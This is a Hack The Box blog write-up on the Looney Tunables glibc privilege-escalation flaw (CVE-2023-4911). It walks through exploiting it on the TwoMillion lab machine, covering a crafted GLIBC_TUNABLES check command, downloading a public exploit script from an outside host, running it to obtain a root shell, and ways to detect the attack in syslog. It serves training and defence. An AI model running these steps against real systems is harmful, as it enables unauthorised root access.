Hack The Box: Cybersecurity Training
Popular Topics
  • JOIN NOW
ALL Red Teaming Blue Teaming Cyber Teams Education CISO Diaries Customer Stories Write-Ups CVE Explained News Career Stories Humans of HTB Attack Anatomy Artificial Intelligence

CVE Explained

8 min read

Exploiting the Looney Tunables vulnerability on HTB (CVE-2023-4911)

A quick overview of the recently discovered vulnerability. Learn how you can practice exploiting (and defending against) the local privilege escalation attack on the HTB platform!

0xdf avatar

0xdf,
Oct 11
2023

Hack The Box Article

On October 3, 2023, Qualys announced their discovery of CVE-2023-4911

Loading Preview...

, otherwise known as Looney Tunables. The local privilege escalation vulnerability impacts the default installations of most major Linux distributions.

In this post, we’ll give a quick overview of the vulnerability and walk through how you can practice exploiting it on Hack The Box (HTB).

Vulnerability background (CVE-2023-4911) 🗒️

The Looney Tunables vulnerability is a buffer overflow in the GNU C library’s dynamic loader. The GNU C library (commonly referred to as glibc) is a foundational component of most Unix operating systems.

As a library, it is loaded by other programs and provides functions to handle all sorts of functionality, such as memory allocation, file input and output, string manipulations, mathematical operations, etc.

The dynamic loader is a binary typically located at /lib/ld-linux-x86-64.so.2. It runs when a program is initiated and is responsible for identifying which libraries are required by the binary, loading those into process memory, and making sure any references are updated to point to the correct addresses in memory.

The dynamic loader uses the GLIBC_TUNABLES environment variable to allow the user to specify certain “tunable” configuration values when the program is run. For example:

GLIBC_TUNABLES=glibc.mem.max_usage=64MB:glibc.cpu.affinity=0

This would set the maximum memory usage to 64MB and the CPU affinity (related to which processor core the program should try to run on) to core 0. On a system with glibc 2.33 or greater, the full list of tunables on your system can be shown by running:

/lib64/ld-linux-x86-64.so.2 --list-tunables

The vulnerability, in this case, is abused by configuring a maliciously crafted environment (including the GLIBC_TUNABLES variable) such that it causes a buffer overflow in the dynamic loader. This overflow can be controlled to get arbitrary execution and return a shell. If the binary being loaded is running with root privileges (such as a SetUID program), then the resulting shell will also have root privileges.

Note💡: It's worth mentioning that the attacker does not know exactly where in memory this overflow occurs. Therefore, typical techniques for exploiting the vulnerability involve running it multiple times over the course of many minutes until successful exploitation occurs and a shell is returned.

Exploit Looney Tunables on Hack The Box 🪄

The TwoMillion

Loading Preview...

machine is vulnerable to Looney Tunables, and is available to play on Hack The Box right now. If you’re interested in trying on your own without a full walkthrough, there are additional Guided Mode

Loading Preview...

questions at the end of the original ones that specifically focus on looking at Looney Tunables.

Play TwoMillion

Note💡: To skip to the privilege escalation in this machine, feel free to use:

  • Username: admin

  • Password: SuperDuperPass123

As the vulnerability is only a week old, new proof of concept (POC) exploits are still being released. At this point, the exploit I’ve had the most success with is from Twitter user, bl4sty

Loading Preview...

:

blasty-looney-tunables

It provides a Python script that will:

  • Generate a patched version of glibc that runs a shell on being loaded.

  • Setup the environment to enable the overflow.

  • Execute a SetUID binary su repeatedly until a shell is returned.

I’ll SSH into the box as the admin user:

oxdf@hacky$ sshpass -p SuperDuperPass123 ssh admin@2million.htb
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)
…[snip]...
admin@2million:~$

I’ll add the 2million.htb domain into my /etc/hosts file, or you could use the IP of your target instead if you’d rather. I’m also using the sshpass program to include the password on the command line. This is typically very bad practice in production environments, but it works nicely for taking notes on HTB challenges.

To check if the box is vulnerable, I can run the following command:

admin@2million:~$ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)

The segfault indicates that it _is_ vulnerable.

I’ll save a copy of gnu-acme.py in my VM, and scp it to TwoMillion:

oxdf@hacky$ wget https://haxx.in/files/gnu-acme.py
--2023-10-10 11:14:23--  https://haxx.in/files/gnu-acme.py
Resolving haxx.in (haxx.in)... 54.37.234.99
Connecting to haxx.in (haxx.in)|54.37.234.99|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11759 (11K) [text/x-python]
Saving to: ‘gnu-acme.py’
gnu-acme.py                                          100%[========================================>]  11.48K  --.-KB/s    in 0.1s    
2023-10-10 11:14:26 (89.0 KB/s) - ‘gnu-acme.py’ saved [11759/11759]
oxdf@hacky$ sshpass -p SuperDuperPass123 scp gnu-acme.py admin@2million.htb:~/

I’ll then run the script. It locates the libc binary and, once loaded, gets the build ID, creates a folder named ”, and writes a patched libc into that path:

admin@2million:~$ python3 gnu-acme.py 
      $$$ glibc ld.so (CVE-2023-4911) exploit $$$
            -- by blasty <peter@haxx.in> --      
[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] suid target = /usr/bin/su, suid_args = ['--help']
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = 61ef896a699bb1c2e4e231642b2e1688b2f1a61e
[i] __libc_start_main = 0x29dc0
[i] using hax path b'"' at offset -20
[i] wrote patched libc.so.6
[i] using stack addr 0x7ffe1010100c

Then it starts trying to exploit, showing "." characters along the bottom to show failed attempts. This typically takes a long time, depending on the host hardware and configuration. On TwoMillion, I’ve had it run as fast as five minutes, and as long as over 30. After several minutes, it messages that it has a shell:

[i] using hax path b'"' at offset -20               
[i] wrote patched libc.so.6                         
[i] using stack addr 0x7ffe1010100c                                                                      
...................................................................................................................................................................................................................
............................................# ** ohh... looks like we got a shell? **

There’s no prompt (or, it is present before the “ohh” text). Still, entering a command works, and then a new prompt appears:

id                                                                                                       
uid=0(root) gid=1000(admin) groups=1000(admin)                                                           
#

Defending against Looney Tunables🛡️

To protect a system against this local privileges escalation attack, update to the latest libc version.

There are a couple different strategies to detect Looney Tunables attacks. Just as new POCs are still surfacing every day, vendors are deploying and/or releasing detection rules as well.

Because many POCs are invoking the su binary (though most SetUID binaries would work), some detections for su brute force attacks will trigger when this exploit is run.

If you have a system that is configured to log environment variables, this would be very easy to detect. However, it is not common to configure systems in this way, as secrets are often stored in environment variables, and you wouldn’t want to log them.

Another way to identify this attack is to look for crashing SetUID binaries, especially if it happens a lot within a short period of time. These events can be seen in /var/log/syslog:

root@2million:/var/log# tail syslog
Oct 10 12:54:49 localhost kernel: [278208.489198] su[82432]: segfault at 7ffe10101014 ip 00007f88db0b19de sp 00007fff3f892fd0 error 4 in ld-linux-x86-64.so.2[7f88db0ab000+2a000]
Oct 10 12:54:49 localhost kernel: [278208.489213] Code: 48 c7 83 c0 03 00 00 ff ff ff ff 48 85 c0 0f 84 fd 00 00 00 48 8b 53 68 48 8b 72 08 31 d2 f6 83 1e 03 00 00 20 74 03 48 8b 13 <48> 03 70 08 48 8d bb 30 03 00 00 48 8d 0d c8 53 02 00 48 01 d6 48
Oct 10 12:54:49 localhost kernel: [278208.868410] su[82434]: segfault at 7ffe10101014 ip 00007fbf48f489de sp 00007fffe5b0c510 error 4 in ld-linux-x86-64.so.2[7fbf48f42000+2a000]
Oct 10 12:54:49 localhost kernel: [278208.868424] Code: 48 c7 83 c0 03 00 00 ff ff ff ff 48 85 c0 0f 84 fd 00 00 00 48 8b 53 68 48 8b 72 08 31 d2 f6 83 1e 03 00 00 20 74 03 48 8b 13 <48> 03 70 08 48 8d bb 30 03 00 00 48 8d 0d c8 53 02 00 48 01 d6 48
Oct 10 12:54:49 localhost kernel: [278209.373393] su[82436]: segfault at 7ffe10101014 ip 00007f2f6fda69de sp 00007ffead726f20 error 4 in ld-linux-x86-64.so.2[7f2f6fda0000+2a000]
Oct 10 12:54:49 localhost kernel: [278209.373408] Code: 48 c7 83 c0 03 00 00 ff ff ff ff 48 85 c0 0f 84 fd 00 00 00 48 8b 53 68 48 8b 72 08 31 d2 f6 83 1e 03 00 00 20 74 03 48 8b 13 <48> 03 70 08 48 8d bb 30 03 00 00 48 8d 0d c8 53 02 00 48 01 d6 48
Oct 10 12:54:50 localhost kernel: [278209.839238] su[82438]: segfault at 7ffe10101014 ip 00007f5dbac949de sp 00007ffd41a90f70 error 4 in ld-linux-x86-64.so.2[7f5dbac8e000+2a000]
Oct 10 12:54:50 localhost kernel: [278209.839258] Code: 48 c7 83 c0 03 00 00 ff ff ff ff 48 85 c0 0f 84 fd 00 00 00 48 8b 53 68 48 8b 72 08 31 d2 f6 83 1e 03 00 00 20 74 03 48 8b 13 <48> 03 70 08 48 8d bb 30 03 00 00 48 8d 0d c8 53 02 00 48 01 d6 48
Oct 10 12:54:50 localhost kernel: [278210.360589] su[82440]: segfault at 7ffe10101014 ip 00007ffa1768d9de sp 00007ffc1c9d96a0 error 4 in ld-linux-x86-64.so.2[7ffa17687000+2a000]
Oct 10 12:54:50 localhost kernel: [278210.360613] Code: 48 c7 83 c0 03 00 00 ff ff ff ff 48 85 c0 0f 84 fd 00 00 00 48 8b 53 68 48 8b 72 08 31 d2 f6 83 1e 03 00 00 20 74 03 48 8b 13 <48> 03 70 08 48 8d bb 30 03 00 00 48 8d 0d c8 53 02 00 48 01 d6 48

There are segfault events in a SetUID binary (su) in the loader (ld-linux-x86-64.so). That’s a great signal for Looney Tunables exploitation.

Play TwoMillion now

TwoMillion is an Easy difficulty Linux box that was released to celebrate reaching 2 million users on Hack The Box. The box features an old version of the HTB platform that includes the old hackable invite code and allows you to practice the exploitation of CVE-2023-4911 and CVE-2023-0386.  

Play TwoMillion
 

David Forsythe (0xdf), Training Lab Architect, Hack The Box

David Forsythe is a CTF addict and cybersecurity professional with over 18 years of experience in infosec. He's worked in SOC/CIRT, threat intelligence, red teaming, and threat research. David holds several certifications, including OSCP, GXPN, GDAT, GREM, GCFA, GCFE.

Outside of helping HTB design cutting-edge cybersecurity content, he enjoys sharing knowledge and developing his skills alongside others through his blog (0xdf hacks stuff

Loading Preview...

), where he posts write-ups of exciting hacking challenges and real-world scenarios and his YouTube channel

Loading Preview...

, where he dives deep into exploit/malware analysis. Feel free to connect with him on LinkedIn

Loading Preview...

. 

 

GET A DEMO FREE TRIAL

Contents

  • Vulnerability background (CVE-2023-4911) 🗒️
  • Exploit Looney Tunables on Hack The Box 🪄
  • Defending against Looney Tunables🛡️

Latest News

Hack the Box Blog

News

2 min read

Hack The Box invites all corporate teams to benchmark their skills through the Global Cyber Skills Benchmark 2025

Noni avatar Noni, May 12, 2025

Hack the Box Blog

Artificial Intelligence

6 min read

AI Red Teaming explained: Adversarial simulation, testing, and capabilities

b3rt0ll0 avatar b3rt0ll0, May 09, 2025

Hack the Box Blog

News

5 min read

Hack The Box partners with Norwich University to revolutionize cybersecurity education

Cait avatar Cait, May 07, 2025

Hack The Blog

The latest news and updates, direct from Hack The Box

Read More
Hack The Box: Cybersecurity Training

The #1 platform to build attack-ready
teams and organizations.

Get a demo

Forrester wave leader Forrester wave leader
ISO 27001 ISO 27701 ISO 9001
G2 rating Capterra rating

Products
Teams
Courses & Certifications Cyber Ranges Enterprise Attack Simulations Cloud Infrastructure Simulations Capture The Flag Tabletop Exercises Talent Sourcing
Individuals
Courses & Certifications Hacking Labs Defensive Labs Red Team Labs Capture The Flag Job Board
Solutions
Job Roles
Red Teams Blue Teams Purple Teams
Industries
Government Higher Education Finance Professional Services
Use Cases
Technical Onboarding Team Benchmarking Candidate Assessment Threat Management Code Vulnerability Crisis Simulation Governance & Compliance
Resources
Community Blog Industry Reports Webinars AMAs Learn with HTB Customer Stories Cheat Sheets Compliance Sheets Glossary Guides & Templates Parrot OS Help Center
Programs
Channel & Resellers Ambassador Program Affiliate Program SME Program
Company
About us Careers Brand Guidelines Certificate Validation Trust Center Product Updates Status
Contact Us
Press Support Enterprise Sales
Partners
Become a Partner Register a Deal
Store
HTB Swag Buy Gift Cards
Products
Teams
Courses & Certifications Cyber Ranges Enterprise Attack Simulations Cloud Infrastructure Simulations Capture The Flag Tabletop Exercises Talent Sourcing

Individuals

Courses & Certifications Hacking Labs Defensive Labs Red Team Labs Capture The Flag Job Board
Solutions
Job Roles
Red Teams Blue Teams Purple Teams

Industries

Government Higher Education Finance Professional Services

Use Cases

Technical Onboarding Team Benchmarking Candidate Assessment Threat Management Code Vulnerability Crisis Simulation Governance & Compliance
Resources
Community Blog Industry Reports Webinars AMAs Learn with HTB Customer Stories Cheat Sheets Compliance Sheets Glossary Guides & Templates Parrot OS Help Center

Programs

Channel & Resellers Ambassador Program Affiliate Program SME Program
Company
About us Careers Brand Guidelines Certificate Validation Trust Center Product Updates Status

Contact Us

Press Support Enterprise Sales

Partners

Become a Partner Register a Deal

Store

HTB Swag Buy Gift Cards
Cookie Settings
Privacy Policy
User Agreement
© 2025 Hack The Box